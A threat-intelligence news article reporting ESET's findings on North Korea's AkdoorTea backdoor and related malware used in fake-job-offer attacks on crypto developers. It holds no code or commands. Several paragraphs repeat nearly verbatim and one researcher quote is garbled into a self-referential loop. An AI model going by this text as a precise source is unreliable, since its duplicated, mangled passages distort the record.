Ethical Hacking News

North Korean Hackers Unveil New AkdoorTea Backdoor: A Global Crypto Developer's Worst Nightmare

North Korean hackers have unveiled a new AkdoorTea backdoor designed to target global crypto developers. The malware is just one piece of a larger puzzle created by North Korean hackers to steal sensitive data from browsers and cryptocurrency wallets, as well as deliver several pieces of malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost. This sophisticated threat actor has been linked to other attacks such as the Contagious Interview campaign and is believed to be part of the larger Lazarus Group umbrella.

The AkdoorTea backdoor is attributed to North Korean threat actors associated with the Contagious Interview campaign, targeting software developers on Windows, Linux, and macOS.

The malware is delivered via phishing attacks impersonating job offers on platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List.

The attacks install malware such as TsunamiKit, Tropidoor, BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost.

The DeceptiveDevelopment group's toolset is mostly multi-platform and includes obfuscated scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET.

The Tropidoor malware overlaps with Lazarus Group tools like LightlessCan and PostNapTea, making it a sophisticated payload linked to the group.

The campaign shares some level of overlaps with Pyongyang's fraudulent IT worker scheme (aka WageMole), believed to have been ongoing since 2017.

North Korean hackers have been busy lately, and their latest creation has left the cybersecurity community reeling. In a recent report, Slovak cybersecurity firm ESET has attributed a new backdoor called AkdoorTea to North Korean threat actors associated with the Contagious Interview campaign. This sophisticated malware is designed to target software developers across all operating systems, including Windows, Linux, and macOS, particularly those involved in cryptocurrency and Web3 projects.

The AkdoorTea backdoor is just one piece of a larger puzzle, which also includes tools like TsunamiKit and Tropidoor. These malicious tools are designed to steal sensitive data from browsers and cryptocurrency wallets, as well as deliver several pieces of malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost. The malware is delivered via phishing attacks that impersonate job offers on platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List.

Once a prospective target expresses interest in the opportunity, they are asked to complete a video assessment by clicking on a link or a coding exercise. The programming assignment requires them to clone projects hosted on GitHub, which silently install malware. On the other hand, websites explicitly set up for undertaking the so-called video assessment display non-existent errors related to camera or microphone access being blocked, and urge them to follow ClickFix-style instructions to rectify the problem by either launching the command prompt or the Terminal app, depending on the operating system used.

The attacks have been generally found to deliver several pieces of malware, which include a remote access trojan dubbed AkdoorTea that's delivered by means of a Windows batch script. The script downloads a ZIP file ("nvidiaRelease.zip") and executes a Visual Basic Script present in it, which then proceeds to launch BeaverTail and AkdoorTea payloads also contained in the archive.

AkdoorTea gets its name from the fact that it shares commonalities with Akdoor, which is described as a variant of the NukeSped (aka Manuscrypt) implant – further reinforcing Contagious Interview's connections to the larger Lazarus Group umbrella. The DeceptiveDevelopment group's toolset is mostly multi-platform and consists of initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET.

"ESET said that the tools used by the DeceptiveDevelopment group are 'mostly multi-platform' and include 'initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET'," according to ESET researchers Peter Kálnai and Matěj Havránek. "DeceptiveDevelopment's toolset is mostly multi-platform and consists of initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET."

The campaign essentially involves the impersonated recruiters offering what appear to be lucrative job roles over platforms like LinkedIn, Upwork, Freelancer, and Crypto Jobs List. After initial outreach, should the prospective target express interest in the opportunity, they are either asked to complete a video assessment by clicking on a link or a coding exercise.

The programming assignment requires them to clone projects hosted on GitHub, which silently install malware. On the other hand, websites explicitly set up for undertaking the so-called video assessment display non-existent errors related to camera or microphone access being blocked, and urge them to follow ClickFix-style instructions to rectify the problem by either launching the command prompt or the Terminal app, depending on the operating system used.

The attacks have been generally found to deliver several pieces of malware such as TsunamiKit and Tropidoor. The toolkit comprises several components, the starting point being the initial stage TsunamiLoader that triggers the execution of an injector (TsunamiInjector), which, in turn, drops TsunamiInstaller and TsunamiHardener.

"TsunamiKit is likely a modification of a dark web project rather than a native creation of the threat actor, given that samples related to the toolkit have been uncovered dating back to December 2021, predating the onset of Contagious Interview, which is believed to have commenced sometime in late 2022," ESET said.

The BeaverTail stealer and downloader has also been found to act as a distribution vehicle for another malware known as Tropidoor that, according to ASEC, overlaps with a Lazarus Group tool called LightlessCan. ESET said it found evidence of Tropidoor artifacts uploaded to VirusTotal from Kenya, Colombia, and Canada, adding the malware also shares "large portions of code" with PostNapTea, a malware used by the threat actor against South Korean targets in 2022.

PostNapTea supports commands for configuration updates, file manipulation and screen capturing, file system management, process management, and running custom versions of Windows commands like whoami, netstat, tracert, lookup, ipconfig, and systeminfo, among others, for improved stealth – a feature also present in LightlessCan.

"The Tropidoor malware is the most sophisticated payload yet linked to the DeceptiveDevelopment group, probably because it is based on malware developed by the more technically advanced threat actors under the Lazarus umbrella," ESET said.

The campaign has been found to share some level of overlaps with Pyongyang's fraudulent IT worker scheme (aka WageMole), which is believed to have been ongoing since 2017. Cybersecurity company Trellix, in a report published this week, said it uncovered an instance of a North Korean IT worker employment fraud targeting a U.S. healthcare company, where an individual using the name "Kyle Lankford" applied for a Principal Software Engineer position.

"The activities of North Korean IT workers constitute a hybrid threat," ESET noted. "This fraud-for-hire scheme combines classical criminal operations, such as identity theft and synthetic identity fraud, with digital tools, which classify it as both a traditional crime and a cybercrime (or e-crime)."

In conclusion, the AkdoorTea backdoor is just one piece of a larger puzzle created by North Korean hackers to target global crypto developers. The malware is designed to steal sensitive data from browsers and cryptocurrency wallets, as well as deliver several pieces of malware such as BeaverTail, InvisibleFerret, OtterCookie, GolangGhost, and PylangGhost.

The campaign has been found to share some level of overlaps with Pyongyang's fraudulent IT worker scheme (aka WageMole), which is believed to have been ongoing since 2017. The DeceptiveDevelopment group's toolset is mostly multi-platform and consists of initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET.

"ESET said that the tools used by the DeceptiveDevelopment group are 'mostly multi-platform' and include 'initial obfuscated malicious scripts in Python and JavaScript, basic backdoors in Python and Go, and a dark web project in .NET'," according to ESET researchers Peter Kálnai and Matěj Havránek.

Related Information:

https://www.ethicalhackingnews.com/articles/North-Korean-Hackers-Unveil-New-AkdoorTea-Backdoor-A-Global-Crypto-Developers-Worst-Nightmare-ehn.shtml

https://thehackernews.com/2025/09/north-korean-hackers-use-new-akdoortea.html

https://tech-wire.in/technology/cyber-security/north-korean-hackers-use-new-akdoortea-backdoor-to-target-global-crypto-developers/

https://the420.in/north-korea-akdoortea-malware-targets-crypto-developers/

https://gbhackers.com/beavertail-malware/

https://forums.malwarebytes.com/topic/318523-beavertail-and-invisibleferret-malware-target-job-seeking-mac-users/

https://anyrun.substack.com/p/invisibleferret-malware-technical

https://any.run/cybersecurity-blog/invisibleferret-malware-analysis/

https://any.run/cybersecurity-blog/ottercookie-malware-analysis/

https://www.pcrisk.com/removal-guides/32075-ottercookie-malware

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Script/NukeSped.I

https://www.cyfirma.com/research/nukesped-rat-report/